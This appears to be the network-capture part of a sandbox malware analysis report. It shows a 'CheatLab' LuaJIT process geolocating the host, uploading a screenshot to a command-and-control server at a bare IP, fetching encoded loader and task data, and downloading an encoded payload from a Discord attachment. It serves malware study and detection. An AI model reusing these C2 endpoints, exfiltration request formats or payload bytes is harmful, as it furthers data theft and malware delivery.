                                                    1           192.168.2.5  49704        208.95.112.1    80                C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Timestamp  kBytes transferred  Direction  Data
                                                    Nov 4, 2023 01:30:09.475100994 CET  1  OUT  GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                                                    Content-Type: application/json
                                                    User-Agent: Sun
                                                    Host: ip-api.com
                                                    Cache-Control: no-cache
                                                    Nov 4, 2023 01:30:09.569552898 CET  1  IN  HTTP/1.1 200 OK
                                                    Date: Sat, 04 Nov 2023 00:30:08 GMT
                                                    Content-Type: application/json; charset=utf-8
                                                    Content-Length: 112
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 31 35 34 2e 31 36 2e 34 39 2e 38 32 22 7d
                                                    Data Ascii: {"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"154.16.49.82"}


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                    2           192.168.2.5  49706        193.37.71.112   80                C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Timestamp  kBytes transferred  Direction  Data
                                                    Nov 4, 2023 01:30:10.440969944 CET  4  OUT  PUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=qMhxCagN55R5AwRzdpCrqAg3d
                                                    User-Agent: Sun
                                                    Host: 193.37.71.112
                                                    Content-Length: 3933196
                                                    Cache-Control: no-cache
                                                    Nov 4, 2023 01:30:10.441927910 CET  15  OUT  Data Raw: 2d 2d 71 4d 68 78 43 61 67 4e 35 35 52 35 41 77 52 7a 64 70 43 72 71 41 67 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                    Data Ascii: --qMhxCagN55R5AwRzdpCrqAg3dContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
                                                    Nov 4, 2023 01:30:15.413336039 CET  3993  IN  HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 04 Nov 2023 00:30:15 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 2072
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yC7PztHjQ09dZnp43Xmp1vjKeJorLqkcVBgFV4fSvTyq1nrCqS9LsbrsVxaKymlPHfH42%2B8sQzHuPFK042r8OszEOVreaTYdwpI0JUA3N2VgLSdxV0BBDuLh5ASGKSfYlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    CF-RAY: 8208bf4aae484db5-FRA
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Ascii: {"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsODUsOTUsODUsOTUsODgsNzIsNTgsNWIsZTMsYjcsYjAsYTUsYzMsZGYsNmUsOGMsOGIsYzgsY2MsZGMsYzcsYjUsNzAsOTQsN2MsZTEsYWMsZDksYWYsOTksYTYsNjMsOGIsODMsZDAsODcsY2MsYWIsYjAsYWQsOTIsN2QsNmYsNTMsOGYsZGEsNmMsYjcsZGQsYzYsYzksZDksODIsYTcsYTcsZDcsY2YsZGYsYmQsZGMsYTcsNTYsNWUsNjEsNzMsZDYsYzksYzYsY2MsYmIsYWIsNWIsYWEsNjMsYjUsOTIsYmEsZGYsYjEsY2YsOTcsNzQsN2MsY2YsY2IsOWMsYTksOTYsOTQsOGQsN2MsYTMsNjMsNTYsYTIsYTYsYzMsZDYsYmUsZDgsY2MsYWIsYTYsOWMsZDUsNjUsODksNTEsN2YsZTks","tasks":"OTMsYjQsOTIsYWMsYj
                                                    Nov 4, 2023 01:30:15.413363934 CET  3994  IN  Data Raw: 4d 73 4e 54 4d 73 4f 44 67 73 4f 47 4d 73 4f 44 4d 73 4f 44 59 73 4f 57 51 73 4f 44 41 73 4e 32 45 73 4f 44 6b 73 59 32 55 73 59 54 45 73 59 6a 49 73 5a 47 59 73 4e 32 4d 73 59 54 63 73 4e 6d 49 73 4f 54 6b 73 59 57 49 73 59 54 67 73 59 54 59 73
                                                    Data Ascii: MsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2MsNmUsN
                                                    Nov 4, 2023 01:30:15.413377047 CET  3995  IN  Data Raw: 59 6a 49 73 5a 44 45 73 59 6a 67 73 59 6d 49 73 5a 54 45 73 59 6a 6b 73 59 32 4d 73 5a 54 41 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 4f 54 59 73 59 6d 49 73 5a 47 49 73 59 7a 51 73 4f 54 6b 73 59 7a 41 73 4f 54 45 73 22 7d
                                                    Data Ascii: YjIsZDEsYjgsYmIsZTEsYjksY2MsZTAsODQsNzIsNjQsOTYsYmIsZGIsYzQsOTksYzAsOTEs"}
                                                    Nov 4, 2023 01:30:51.020667076 CET | 5813 | OUT | PUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                    Content-Type: application/json
                                                    User-Agent: Sun
                                                    Host: 193.37.71.112
                                                    Content-Length: 95
                                                    Cache-Control: no-cache
                                                    Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 41 73 4f 44 51 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d
                                                    Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
                                                    Nov 4, 2023 01:30:51.323874950 CET | 5814 | IN | HTTP/1.1 204 No Content
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 04 Nov 2023 00:30:51 GMT
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D%2FThL2Krtm0YP%2FwYU3gTxh9L4Y6kP97ubTeLdSmeacK4UJJ8acJazfSZhoQNcrPWetejRtymRjIT63DwR3RkmPmceROU3Qf2NaOSqdomr%2Fd6D6%2FHLAvH0PBC%2F4D3R8S7qPlYT2gSyRliJMp3Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    CF-RAY: 8208c03189909da5-DME
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    3 | 192.168.2.5 | 49715 | 162.159.130.233 | 80 | C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Nov 4, 2023 01:30:15.792700052 CET | 3995 | OUT | GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
                                                    Content-Type: application/json
                                                    User-Agent: Sun
                                                    Host: cdn.discordapp.com
                                                    Cache-Control: no-cache
                                                    Nov 4, 2023 01:30:15.897494078 CET | 3997 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Sat, 04 Nov 2023 00:30:15 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Cache-Control: max-age=3600
                                                    Expires: Sat, 04 Nov 2023 01:30:15 GMT
                                                    Location: https://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                    Set-Cookie: __cf_bm=kCi2GYOZeYHyA10sUg_bOGn89f2AWCraeEUmTMI9E1Y-1699057815-0-Ae7NdqYh6y4Vn05KJQP1pqOYfL0VjeRaSbco9oI2dfRUDSdYbfh+TLhUFMMvRdmJhd3Po/8vja/n0aNCiZvYc6w=; path=/; expires=Sat, 04-Nov-23 01:00:15 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SnZwbQXUCLxbCaKj%2FyUud3I5vgbcZsvWaDqB8HA8Q5xY6fo8oSg%2FfWe0qJbGNZM%2Fiot2lxIM3f90rHVX1F8fByCs16w3tnGilQwH4U8hs8OB3BL%2FEMhKrQ8qzr%2FogbVTXiIdLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Set-Cookie: _cfuvid=s5rVrnaiMIWihEPRd4K_XSgaFFGJdcRN_pQvtzzHOtQ-1699057815839-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                                                    Server: cloudflare
                                                    CF-RAY: 8208bf54ebec3b84-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.5 | 49716 | 162.159.130.233 | 443 | C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    2023-11-04 00:30:16 UTC | 0 | OUT | GET /attachments/1166694372084027482/1169541101917577226/2.txt HTTP/1.1
                                                    User-Agent: Sun
                                                    Cache-Control: no-cache
                                                    Host: cdn.discordapp.com
                                                    Connection: Keep-Alive
                                                    Cookie: __cf_bm=kCi2GYOZeYHyA10sUg_bOGn89f2AWCraeEUmTMI9E1Y-1699057815-0-Ae7NdqYh6y4Vn05KJQP1pqOYfL0VjeRaSbco9oI2dfRUDSdYbfh+TLhUFMMvRdmJhd3Po/8vja/n0aNCiZvYc6w=; _cfuvid=s5rVrnaiMIWihEPRd4K_XSgaFFGJdcRN_pQvtzzHOtQ-1699057815839-0-604800000
                                                    2023-11-04 00:30:16 UTC | 0 | IN | HTTP/1.1 200 OK
                                                    Date: Sat, 04 Nov 2023 00:30:16 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 1807199
                                                    Connection: close
                                                    CF-Ray: 8208bf57b8483b47-IAD
                                                    CF-Cache-Status: HIT
                                                    Accept-Ranges: bytes
                                                    Age: 48502
                                                    Cache-Control: public, max-age=31536000
                                                    Content-Disposition: attachment; filename="2.txt"
                                                    ETag: "f4206dcdebda4c957baa06ba3c826c08"
                                                    Expires: Sun, 03 Nov 2024 00:30:16 GMT
                                                    Last-Modified: Thu, 02 Nov 2023 07:38:47 GMT
                                                    Vary: Accept-Encoding
                                                    Alt-Svc: h3=":443"; ma=86400
                                                    x-goog-generation: 1698910727777197
                                                    x-goog-hash: crc32c=qEYgSw==
                                                    x-goog-hash: md5=9CBtzevaTJV7qga6PIJsCA==
                                                    x-goog-metageneration: 1
                                                    x-goog-storage-class: STANDARD
                                                    x-goog-stored-content-encoding: identity
                                                    x-goog-stored-content-length: 1807199
                                                    X-GUploader-UploadID: ABPtcPrZR6jFo6v-01nkpJ6zVE1tWRXI9dXTrpDef7JLPv3FYPxBjlZAQtSknLz9-Z_3gcZ3P8czoL7C8Q
                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MafbYun6lPwI24v%2FbDTkPd9lF5v8TAud4jeB48BSkKGbebY2P%2FkImjyUuDSS%2F39oeS9M9kqhng%2FuxwQBsAf0b%2FK0lpS53VhqzZWk%2FXUWP5IYW5VgJg2jl5azryDJ6z9p4uWR%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    2023-11-04 00:30:16 UTC28INData Raw: 37 33 2c 36 34 2c 35 35 2c 36 35 2c 63 30 2c 38 65 2c 36 34 2c 37 62 2c 37 30 2c 64 30 2c 39 34 2c 63 35 2c 39 65 2c 31 35 34 2c 36 62 2c 61 66 2c 36 62 2c 35 34 2c 65 37 2c 66 34 2c 64 61 2c 31 33 37 2c 31 34 33 2c 31 37 33 2c 31 34 32 2c 31 31 36 2c 31 34 33 2c 31 37 36 2c 31 34 32 2c 31 31 66 2c 37 30 2c 61 39 2c 31 34 39 2c 31 36 31 2c 39 36 2c 36 35 2c 65 35 2c 64 33 2c 36 63 2c 31 33 38 2c 31 36 66 2c 31 34 32 2c 31 33 37 2c 38 38 2c 31 34 36 2c 31 36 62 2c 31 34 62 2c 64 66 2c 66 38 2c 38 38 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 38 39 2c 64 31 2c 31 30 31 2c 61 61 2c 31 36 63 2c 31 34 61 2c 31 37 36 2c 31 32 62 2c 31 31 39 2c 33 32 2c 34 31 2c 35 31 2c 63 62 2c 39 64 2c 39 31 2c 39 61 2c 34 36 2c 63 35 2c 63 65 2c 63 30 2c 31 34 32 2c 31 34 65 2c
                                                    Data Ascii: 73,64,55,65,c0,8e,64,7b,70,d0,94,c5,9e,154,6b,af,6b,54,e7,f4,da,137,143,173,142,116,143,176,142,11f,70,a9,149,161,96,65,e5,d3,6c,138,16f,142,137,88,146,16b,14b,df,f8,88,159,166,161,89,d1,101,aa,16c,14a,176,12b,119,32,41,51,cb,9d,91,9a,46,c5,ce,c0,142,14e,
                                                    2023-11-04 00:30:16 UTC29INData Raw: 36 2c 61 33 2c 33 38 2c 63 66 2c 63 31 2c 31 35 36 2c 31 35 35 2c 61 33 2c 31 37 36 2c 31 34 32 2c 31 33 33 2c 62 64 2c 31 32 36 2c 61 65 2c 31 32 36 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 39 2c 31 34 65 2c 31 35 33 2c 31 32 35 2c 31 35 39 2c 31 36 36 2c 31 36 31 2c 63 33 2c 38 39 2c 37 63 2c 64 64 2c 31 34 64 2c 34 63 2c 65 62 2c 34 66 2c 62 66 2c 37 66 2c 31 33 64 2c 61 32 2c 31 34 62 2c 65 63 2c 63 32 2c 35 38 2c 34 36 2c 62 62 2c 66 64 2c 37 34 2c 63 65 2c 39 34 2c 31 32 64 2c 64 39 2c 31 35 31 2c 61 39 2c 31 31 34 2c 36 66 2c 35 34 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c
                                                    Data Ascii: 6,a3,38,cf,c1,156,155,a3,176,142,133,bd,126,ae,126,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,99,14e,153,125,159,166,161,c3,89,7c,dd,14d,4c,eb,4f,bf,7f,13d,a2,14b,ec,c2,58,46,bb,fd,74,ce,94,12d,d9,151,a9,114,6f,54,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,
                                                    2023-11-04 00:30:16 UTC31INData Raw: 39 31 2c 35 61 2c 62 62 2c 64 66 2c 61 37 2c 31 36 33 2c 31 34 61 2c 64 35 2c 34 38 2c 37 34 2c 35 61 2c 66 38 2c 39 30 2c 31 37 33 2c 63 65 2c 31 31 39 2c 38 66 2c 31 30 33 2c 35 35 2c 36 33 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 31 34 65 2c 66 35 2c 39 34 2c 38 61 2c 66 32 2c 31 34 37 2c 39 35 2c 31 30 37 2c 31 34 30 2c 31 32 36 2c 31 33 39 2c 31 31 37 2c 31 34 33 2c 31 30 66 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 31 34 65 2c 66 36 2c 36 34 2c 65 35 2c 62 34 2c 31 35 65 2c 63 33 2c 38 36 2c 61 34 2c 31
                                                    Data Ascii: 91,5a,bb,df,a7,163,14a,d5,48,74,5a,f8,90,173,ce,119,8f,103,55,63,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,91,14e,f5,94,8a,f2,147,95,107,140,126,139,117,143,10f,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,91,14e,f6,64,e5,b4,15e,c3,86,a4,1
                                                    2023-11-04 00:30:16 UTC32INData Raw: 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 31 35 34 2c 61 30 2c 39 61 2c 36 62 2c 35 34 2c 36 39 2c 31 31 64 2c 31 32 32 2c 62 64 2c 31 30 34 2c 65 39 2c 36 34 2c 66 38 2c 39 38 2c 31 37 33 2c 63 65 2c 33 64 2c 31 31 61 2c 36 34 2c 35 34 2c 36 33 2c 35 35 2c 66 30 2c 61 35 2c 31 34 32 2c 31 32 30 2c 63 34 2c 37 34 2c 34 33 2c 34 66 2c 62 63 2c 31 33 33 2c 63 39 2c 31 30 66 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 37 2c 31 33 64 2c 64 62 2c 61 33 2c 35 39 2c 66 30 2c 31 33 64 2c 61 33 2c 66 62 2c 31 30 35 2c 31 33 63 2c 31 30 66 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30
                                                    Data Ascii: ,15c,94,d8,7e,14a,154,a0,9a,6b,54,69,11d,122,bd,104,e9,64,f8,98,173,ce,3d,11a,64,54,63,55,f0,a5,142,120,c4,74,43,4f,bc,133,c9,10f,11e,137,120,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,77,13d,db,a3,59,f0,13d,a3,fb,105,13c,10f,11b,fd,11a,138,118,11e,137,120
                                                    2023-11-04 00:30:16 UTC33INData Raw: 33 63 2c 62 35 2c 34 66 2c 39 66 2c 62 63 2c 61 33 2c 31 36 34 2c 64 37 2c 39 34 2c 38 33 2c 37 66 2c 39 66 2c 36 66 2c 62 32 2c 63 33 2c 39 31 2c 31 36 63 2c 31 34 32 2c 39 36 2c 34 63 2c 37 37 2c 34 33 2c 33 37 2c 37 37 2c 34 39 2c 61 31 2c 31 34 62 2c 63 35 2c 37 30 2c 35 38 2c 34 36 2c 62 62 2c 66 64 2c 38 30 2c 63 65 2c 39 63 2c 31 32 39 2c 64 39 2c 62 64 2c 36 30 2c 37 64 2c 63 30 2c 36 30 2c 65 33 2c 62 63 2c 31 35 65 2c 63 33 2c 38 39 2c 31 37 30 2c 61 61 2c 66 38 2c 39 38 2c 31 36 66 2c 31 32 62 2c 34 39 2c 33 32 2c 34 31 2c 35 31 2c 65 65 2c 39 61 2c 31 35 64 2c 65 33 2c 31 32 62 2c 39 35 2c 66 62 2c 37 38 2c 34 33 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c
                                                    Data Ascii: 3c,b5,4f,9f,bc,a3,164,d7,94,83,7f,9f,6f,b2,c3,91,16c,142,96,4c,77,43,37,77,49,a1,14b,c5,70,58,46,bb,fd,80,ce,9c,129,d9,bd,60,7d,c0,60,e3,bc,15e,c3,89,170,aa,f8,98,16f,12b,49,32,41,51,ee,9a,15d,e3,12b,95,fb,78,43,11b,fd,11a,138,118,11e,137,120,126,133,12e,
                                                    2023-11-04 00:30:16 UTC35INData Raw: 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 61 64 2c 31 34 65 2c 39 39 2c 38 65 2c 31 31 62 2c 38 64 2c 35 32 2c 63 66 2c 66 35 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 39 34 2c 64 38 2c 65 33 2c 39 32 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 38 33 2c 39 32 2c 61 34 2c 62 39 2c 61 63 2c 65 65 2c 62 64 2c 31 33 36 2c 63 31 2c 38 36 2c 31 35 63 2c 31 30 61 2c 39 34 2c 31 32 64 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 66 36 2c 39 39 2c 31 34 36 2c 66 32 2c 36 61 2c 63 33 2c 39 39 2c 31 36 30 2c 35 64 2c 62 65 2c 34 66 2c 31 30 32 2c 31 30 64 2c 31 31 63 2c 36 36 2c 34 31 2c 35 31 2c 36 33 2c 64 38 2c 31 34 35 2c 35 61 2c 62 61 2c 34 30 2c 63 34 2c 62 64 2c 31 32 66 2c 31 33 37 2c 64 38 2c 31 34 32 2c 31 36 62 2c 31 34 62 2c 31 33 64 2c 37 38 2c 31 31
                                                    Data Ascii: ,124,112,8d,c4,15c,ad,14e,99,8e,11b,8d,52,cf,f5,5a,67,62,38,94,d8,e3,92,4b,77,43,34,83,92,a4,b9,ac,ee,bd,136,c1,86,15c,10a,94,12d,4e,6c,4c,52,f6,99,146,f2,6a,c3,99,160,5d,be,4f,102,10d,11c,66,41,51,63,d8,145,5a,ba,40,c4,bd,12f,137,d8,142,16b,14b,13d,78,11
                                                    2023-11-04 00:30:16 UTC36INData Raw: 31 33 64 2c 64 63 2c 36 62 2c 65 30 2c 37 36 2c 65 33 2c 38 62 2c 31 33 34 2c 63 34 2c 37 38 2c 34 36 2c 39 39 2c 33 35 2c 31 33 36 2c 62 31 2c 31 34 30 2c 31 35 31 2c 31 36 61 2c 64 39 2c 31 31 61 2c 64 62 2c 37 64 2c 63 33 2c 39 31 2c 31 37 30 2c 65 35 2c 37 65 2c 64 36 2c 37 39 2c 63 65 2c 38 31 2c 31 32 65 2c 63 63 2c 35 61 2c 36 36 2c 39 64 2c 36 39 2c 31 34 30 2c 37 33 2c 31 32 63 2c 31 33 38 2c 31 36 66 2c 63 65 2c 31 31 37 2c 31 31 39 2c 35 34 2c 36 63 2c 34 63 2c 35 32 2c 66 36 2c 31 33 39 2c 62 37 2c 31 32 61 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 66 2c 31 33 64 2c 64 34 2c 31 32 34 2c 35 39 2c 31 34 64 2c 66 35 2c 38 39 2c 33 38 2c 33 39 2c 66 62 2c 31 32 38 2c 61 63 2c 66 34
                                                    Data Ascii: 13d,dc,6b,e0,76,e3,8b,134,c4,78,46,99,35,136,b1,140,151,16a,d9,11a,db,7d,c3,91,170,e5,7e,d6,79,ce,81,12e,cc,5a,66,9d,69,140,73,12c,138,16f,ce,117,119,54,6c,4c,52,f6,139,b7,12a,12e,104,99,ff,146,be,d4,c4,13f,bf,7f,13d,d4,124,59,14d,f5,89,38,39,fb,128,ac,f4
                                                    2023-11-04 00:30:16 UTC37INData Raw: 35 39 2c 31 36 63 2c 31 34 61 2c 31 37 36 2c 63 36 2c 62 31 2c 33 65 2c 34 31 2c 63 37 2c 38 33 2c 65 30 2c 61 61 2c 36 34 2c 39 36 2c 63 33 2c 38 36 2c 31 35 34 2c 31 32 62 2c 63 37 2c 31 32 64 2c 31 34 64 2c 31 36 62 2c 39 63 2c 64 64 2c 62 38 2c 31 33 63 2c 64 64 2c 31 32 38 2c 36 33 2c 38 39 2c 63 66 2c 63 39 2c 31 34 36 2c 62 66 2c 31 33 33 2c 66 65 2c 34 39 2c 33 34 2c 33 32 2c 63 34 2c 31 31 35 2c 37 33 2c 62 66 2c 36 35 2c 63 32 2c 34 37 2c 63 33 2c 38 36 2c 31 35 34 2c 31 32 62 2c 31 34 37 2c 31 32 33 2c 31 34 64 2c 31 36 62 2c 64 37 2c 39 37 2c 31 34 66 2c 64 66 2c 61 37 2c 31 35 33 2c 65 62 2c 38 30 2c 34 38 2c 66 66 2c 61 66 2c 31 35 31 2c 64 36 2c 62 63 2c 31 32 62 2c 62 64 2c 37 34 2c 35 39 2c 64 63 2c 62 30 2c 36 31 2c 62 36 2c 65 33 2c 39
                                                    Data Ascii: 59,16c,14a,176,c6,b1,3e,41,c7,83,e0,aa,64,96,c3,86,154,12b,c7,12d,14d,16b,9c,dd,b8,13c,dd,128,63,89,cf,c9,146,bf,133,fe,49,34,32,c4,115,73,bf,65,c2,47,c3,86,154,12b,147,123,14d,16b,d7,97,14f,df,a7,153,eb,80,48,ff,af,151,d6,bc,12b,bd,74,59,dc,b0,61,b6,e3,9
                                                    2023-11-04 00:30:16 UTC39INData Raw: 32 2c 61 66 2c 34 38 2c 39 35 2c 66 66 2c 61 37 2c 31 36 35 2c 31 33 33 2c 31 35 65 2c 31 33 64 2c 31 33 33 2c 31 33 31 2c 34 34 2c 39 36 2c 36 62 2c 61 35 2c 31 34 64 2c 61 36 2c 34 36 2c 33 38 2c 33 39 2c 66 33 2c 31 30 37 2c 35 62 2c 62 61 2c 39 33 2c 31 36 38 2c 63 66 2c 63 66 2c 31 36 37 2c 35 34 2c 63 65 2c 36 66 2c 65 64 2c 38 64 2c 31 34 30 2c 66 64 2c 61 66 2c 31 35 64 2c 31 33 36 2c 39 63 2c 63 65 2c 37 39 2c 33 65 2c 37 63 2c 39 36 2c 37 37 2c 63 38 2c 36 65 2c 31 31 66 2c 38 62 2c 31 32 34 2c 31 33 38 2c 31 36 66 2c 31 34 32 2c 31 34 65 2c 31 31 63 2c 35 63 2c 66 37 2c 39 39 2c 35 65 2c 39 65 2c 31 32 36 2c 39 35 2c 62 34 2c 37 36 2c 34 37 2c 64 39 2c 31 33 36 2c 65 33 2c 63 32 2c 31 33 37 2c 31 30 32 2c 38 38 2c 31 32 30 2c 62 62 2c 38 36 2c
                                                    Data Ascii: 2,af,48,95,ff,a7,165,133,15e,13d,133,131,44,96,6b,a5,14d,a6,46,38,39,f3,107,5b,ba,93,168,cf,cf,167,54,ce,6f,ed,8d,140,fd,af,15d,136,9c,ce,79,3e,7c,96,77,c8,6e,11f,8b,124,138,16f,142,14e,11c,5c,f7,99,5e,9e,126,95,b4,76,47,d9,136,e3,c2,137,102,88,120,bb,86,
                                                    2023-11-04 00:30:16 UTC40INData Raw: 63 2c 65 35 2c 37 38 2c 65 64 2c 38 35 2c 34 63 2c 37 37 2c 61 34 2c 37 31 2c 31 33 33 2c 65 65 2c 31 33 32 2c 31 33 33 2c 31 33 31 2c 63 63 2c 31 31 39 2c 31 34 62 2c 37 35 2c 31 35 61 2c 31 35 37 2c 31 34 35 2c 63 31 2c 37 65 2c 31 34 38 2c 31 32 62 2c 63 37 2c 31 31 66 2c 31 34 64 2c 31 36 62 2c 64 35 2c 39 37 2c 31 33 66 2c 65 31 2c 39 66 2c 31 33 66 2c 62 32 2c 63 35 2c 39 31 2c 31 34 38 2c 61 62 2c 31 35 35 2c 39 33 2c 31 36 35 2c 31 34 32 2c 31 33 33 2c 62 35 2c 31 30 35 2c 35 39 2c 37 32 2c 31 30 62 2c 31 33 35 2c 64 64 2c 31 31 38 2c 61 63 2c 34 34 2c 66 62 2c 38 38 2c 31 33 62 2c 62 34 2c 31 31 36 2c 37 30 2c 64 35 2c 39 37 2c 31 35 37 2c 31 33 66 2c 35 63 2c 31 35 32 2c 66 39 2c 62 62 2c 63 31 2c 31 36 30 2c 35 61 2c 65 32 2c 37 61 2c 31 30 32
